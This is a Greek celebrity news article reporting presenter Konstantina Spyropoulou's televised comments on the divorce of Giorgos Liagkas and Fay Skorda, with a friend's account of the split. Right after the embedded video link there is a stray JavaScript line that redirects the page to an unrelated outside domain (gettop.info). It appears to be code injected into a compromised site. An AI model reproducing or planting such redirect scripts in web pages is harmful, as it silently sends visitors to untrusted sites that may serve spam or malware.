Τι είπε η Σπυροπούλου για το διαζύγιο Λιάγκα-Σκορδά (ΒΙΝΤΕΟ)

0
12

 

Είναι γνωστή η αντιπαλότητα της Κωνσταντίνας Σπυροπούλου με τον Γιώργο Λιάγκα με τον οποίο είναι στα δικαστήρια. Ωστόσο, δεν μπορούσε να μην αναφερθεί στην είδηση του διαζυγίου τους. Όπως τόνισε μιλώντας στην εκπομπή της «Σπίτι μου σπιτάκι μου»: «Ένα γεγονός που σίγουρα ευχάριστο δεν μας είναι. Πάντοτε μια είδηση χωρισμού στα αφτιά όλων μας φαντάζει δύσκολη ανεξάρτητα από τους λόγους για την οποία πάρθηκε. Μιλάω για την Φαίη Σκορδά και τον Γιώργο Λιάγκα που χθες μας έγινε γνωστό ότι πήραν χωριστούς δρόμους».

Κατά τη διάρκεια της κουβέντας κι ενώ μιλούσαν για τις φήμες που υπήρχαν το προηγούμενο διάστημα σχετικά με τον χωρισμό Λιάγκα Σκορδά, η Κωνσταντίνα Σπυροπούλου είπε χαρακτηριστικά: «Πάντα μέσα από το αστείο, μέσα από την πλάκα, λες τις αλήθειες».

Η Νάνσυ Παραδεισανού που είναι φίλη της Φαίης Σκορδά και βρίσκεται κοντά της όλο αυτό το διάστημα, αποκάλυψε το παρασκήνιο του διαζυγίου, σύμφωνα με το zappit.gr: «Δεν πήραν χθες την απόφαση. Όλο το καλοκαίρι ο Γιώργος συμβούλευε πάρα πολύ τη Φαίη στην προετοιμασία του Πρωινό. Ήταν εκεί στις πρόβες και στα δοκιμαστικά, είχε πολύ ισχυρή άποψη. Μπορεί να είναι το πιο φιλικό διαζύγιο που ξέρω, υπάρχει τρομερή αγάπη, εκτίμηση και σεβασμός. Είναι μια απόφαση που έχουν πάρει καιρό. Μένουν μαζί στο ίδιο σπίτι».

«Δεν ξέρεις ποτέ. Κανείς δεν σου λέει σε αυτή τη ζωή ότι θα είσαι για πάντα μαζί με κάποιον», είπε η Κωνσταντίνα Σπυροπούλου.

https://www.youtube.com/watch?time_continue=1&v=aQe0-PafXhw setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here